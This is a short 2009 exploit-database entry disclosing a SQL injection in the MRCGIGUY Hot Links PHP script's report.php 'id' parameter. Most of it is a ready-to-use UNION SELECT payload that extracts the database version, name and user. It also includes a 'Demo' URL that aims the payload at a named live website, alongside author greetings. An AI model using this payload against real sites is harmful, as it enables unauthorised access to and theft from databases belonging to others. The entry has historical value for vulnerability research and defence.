MRCGIGUY Hot Links - 'report.php?id' SQL Injection

EDB-ID:

8918

CVE:

N/A


Platform:

PHP

Published:

2009-06-09

MRCGIGUY Hot Links SQL (PHP) (report.php id) Remote SQL Injection
Founder: ThE g0bL!N
------
Home: http:/www.4ckx.com/dz/
----
Vendor:http://www.mrcgiguy.com
Special Thx:  All Muslims All Members Of Team Algerien Of FootBall
Note: Algerie 3-1 Egypt
Exploit:
------
SQL INJECTION:
-------------
http://wwww.victim.com/report.php?id=[SQL CODE]
[ SQL CODE]=17281+union+select+concat(version(),0x3a,database(),0x3a,user()),2,3--
Demo:
----
http://www.myhotlinks.net/hlphpsql/report.php?id=17281+union+select+concat(version(),0x3a,database(),0x3a,user()),2,3--

# milw0rm.com [2009-06-09]